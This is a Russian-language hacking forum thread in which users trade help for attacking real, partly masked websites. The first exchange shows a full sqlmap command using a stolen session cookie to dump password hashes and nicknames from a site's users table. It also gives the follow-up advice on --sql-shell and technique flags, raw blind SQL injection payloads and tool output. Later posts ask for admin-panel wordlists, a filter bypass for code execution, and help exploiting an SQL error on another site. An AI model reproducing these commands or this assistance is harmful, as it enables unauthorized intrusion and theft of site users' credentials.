Вопросы по уязвимостям

[NeuroZnanie]

Доброго времени суток, господа. У меня вопрос. Блайнд в куках. Запрос sqlmap


python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --charset="UTF 8" --dump -D loveumru_*e****l -T users -C password --start=10 --stop=11

Нужны колонки password, nick, id. Вывожу постепенно сначала password потом id и nick. На выводе

Table: users
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 00018c5ea874****77fd119da95b5d2 |
| 00018f2d0ec71d5****2dcf8cb20b8 |
+----------------------------------+
+------+
| id |
+------+
| 1343 |
| 1344 |
+------+

+--------------+
| nick |
+--------------+
| D**Sh* |
| i**he**ov49 |
+--------------+

Но записи не совпадают. Хеш расшифровывается но пароль первого хеша не подходит первому нику. Как сделать совместимый вывод? Поделюсь уязвимостью с тем кто поможет.Один из крупнейших сайтов уникального контента.

[elk]

Да, у меня такое тоже бывает! Иногда колонки почему-то по разному упорядочиваются(особенно в джумле).
Сделай так:

Код:

python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --sql-shell
выскочит следующее
sql-shell> сюда полноценный скл-запрос
sql-shell> select nick,password from loveumru_*e****.users where id=10

Я теперь сразу так делаю...

[NeuroZnanie]

Цитата:

Сообщение от elk

Да, у меня такое тоже бывает! Иногда колонки почему-то по разному упорядочиваются(особенно в джумле).
Сделай так:

Код:

python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --sql-shell
выскочит следующее
sql-shell> сюда полноценный скл-запрос
sql-shell> select nick,password from loveumru_*e****.users where id=10

Я теперь сразу так делаю...

Код:

sql-shell> select password from loveumru_*e***l.users where id=10 
[23:28:45] [INFO] fetching SQL SELECT statement query output: 'select password from loveumru_*e***l.users where id=10 '
[23:28:45] [INFO] retrieved: 
[23:28:46] [WARNING] the SQL query provided does not return any output
[23:28:46] [INFO] retrieved: 0
sql-shell>

В блайндах по ходу не реботает sql-shell.

Сами запросы:

На подбор колонок nick

Код:

336097 AND ORD(MID((SELECT IFNULL(CAST(nick AS CHAR),0x20) FROM loveumru_*e***l.users ORDER BY nick LIMIT 11,1),1,1))>64

password

Код:

336097 AND ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20) FROM loveumru_*e***l.users ORDER BY password LIMIT 11,1),3,1))>96

id

Код:

336097 AND ORD(MID((SELECT IFNULL(CAST(id AS CHAR),0x20) FROM loveumru_*e***l.users ORDER BY id LIMIT 11,1),1,1))>4194192

[elk]

Цитата:

В блайндах по ходу не реботает sql-shell.

Работает, и лучше всего! ;-)

Цитата:

[23:28:46] [INFO] retrieved: 0

Это лишь значит, что с таким id нету юзера в таблице. (у тебя же есть 2 вывода: 1343 и 1344)
Попробуй добиться хоть какого-нибудь вывода через скл-шелл, к примеру:

Цитата:

select password from loveumru_*e***l.users where id>10 (=1343,=1344)
select id from loveumru_*e***l.users where nick like '%a%'

Цитата:

В блайндах

И уточни тип уязвимости, ключом --technique B и убери -b (ну и --level=5 уже не нужен, коли дырка найдена), --dbms=MySQL (без кавычек)

Цитата:

python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --technique B --threads=5 --cookie="***" --random-agent --dbms=MySQL -p userid --sql-shell

[NeuroZnanie]

elk, --level используеться единожды до того как баг был найден, --dbms плевать на то есть или нет кавычек, --technique лучше не выставлять в данном случае потому что

Код:

[12:58:42] [WARNING] the SQL query provided does not return any output
[12:58:42] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:58:43] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..        
[12:58:44] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[12:58:45] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

Но все равно в целом ты красавчик и метод сработал. Приз нужен тебе?)

[elk]

Цитата:

time-based

А я думал, что Boolean-based
Тогда тебе нужно указать --technique T и без потоков (--threads 5)

Цитата:

Приз нужен тебе?)

Ну раз обещал)

[NeuroZnanie]

Господа, подкинте хорошенький список директорий админок и мускула. Помню ettee выкладывал годный список с личного опыта на 18к записей, но он проебался к сожалению, а форума того уже нету(. Только актуальный список а не dirbustera.

[Faaax]

Есть вопрос.
Имеется выполнение кода в адресной строке но только посредством <? code; ?>
Фильтруются знаки < и >
URL HEX encode всё опробовал уже
Есть у кого ещё какие идеи обойти????через пост тоже облом.

[vikler1]

Помогите плиз в раскрутке уязвимости. Есть сайт

Код:

http://**************.com/site/Gallery/Gallery.aspx?ev=cc19c288176'

Ошибка вида:

Код:

Incorrect syntax near 'cc19c288176' '.
Unclosed quotation mark after the character string 'cc19c288176' '.

Однако sqlmap упорно говорит, что параметр ev не injectible... Что делать? Помогите нубу плиз

[Twost]

Цитата:

Сообщение от vikler1

Помогите плиз в раскрутке уязвимости. Есть сайт

Код:

http://**************.com/site/Gallery/Gallery.aspx?ev=cc19c288176'

Ошибка вида:

Код:

Incorrect syntax near 'cc19c288176' '.
Unclosed quotation mark after the character string 'cc19c288176' '.

Однако sqlmap упорно говорит, что параметр ev не injectible... Что делать? Помогите нубу плиз

1) MS SQL
2) Фильтруются некоторые символы
3) Нуб хочет научится, или нуб хочет юзать sqlmap? Если второе - думаю дела плохи.